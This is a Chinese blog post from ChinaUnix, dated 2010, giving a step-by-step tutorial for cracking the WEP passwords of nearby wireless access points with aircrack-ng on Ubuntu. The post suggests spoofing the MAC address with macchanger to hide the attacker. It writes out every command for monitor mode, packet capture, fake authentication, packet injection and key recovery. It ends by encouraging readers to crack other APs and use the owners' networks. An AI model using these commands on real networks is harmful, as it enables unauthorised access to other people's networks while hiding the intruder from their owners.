Chinaunix首页 | 论坛 | 博客
  • 博客访问: 570344
  • 博文数量: 201
  • 博客积分: 7734
  • 博客等级: 少将
  • 技术积分: 1994
  • 用 户 组: 普通用户
  • 注册时间: 2010-04-09 19:18
文章分类

全部博文(201)

文章存档

2011年(28)

2010年(173)

分类: LINUX

2010-06-23 22:18:42

一、安装ubuntu和aircrack-ng
先安装 Ubuntu9.04,更新系统到最新
终端中输入 sudo apt-get install aircrack-ng macchanger  安装aircrack-ng macchanger
没联网的话 到别的电脑上网下载aircrack-ng Ubuntu DEB安装包 安装
下载地址:
 至于macchanger工具  就是改变自己的mac地址,达到隐藏自己! 可要可不要!
语法: macchanger  -s    interface     显示当前网卡mac地址
           macchanger  -m   mac addres   自定义mac地址
           macchanger  -r    生成任意的mac地址
           macchanger  -l    显示已知厂商的mac地址分配空间,可以查看自己网卡产于那个厂商,很有用!

二、破解过程
1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0
(wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看)

2、查看无线AP在终端中输入:
sudo airodump-ng mon0
(特别说明:启动监控模式后无线网的端口现在是 mon0 !!!)
看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端,选择一个wep类型的AP mac地址!

3、抓包
另开一个终端,输入:
sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
(-c 后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP's MAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DA

TA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和 MAC地址,DATA保存的文件名可随便命名)

4、与AP建立虚拟连接
再另开一个终端,输入:
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
(-h后面跟着的My MAC是自己的无线网卡的MAC地址,命令:
iwlist wlan0 scanning
可查看自己的MAC地址)

5、进行注入
成功建立虚拟连接后输入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0
现在回头看下步骤3的终端是不是DA
TA 在开始飞涨!

6、解密
收集有5000个以上的DA
TA之后,另开一个终端,输入:
sudo aircrack-ng wep*.cap
进行解密
(如果没算出来的话,继续等,aircrack-ng 会在DA
TA每增加多5000个之后就自动再运行,直到算出密码为至)

7、收工
破解出密码后在终端中输入 sudo airomon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。现在可以冲浪去了,或者重复步聚1-7破解其它的AP 呵呵兄弟们冲浪时可别太猛了,不然把主人给冲翻了可就不好。

阅读(2229) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~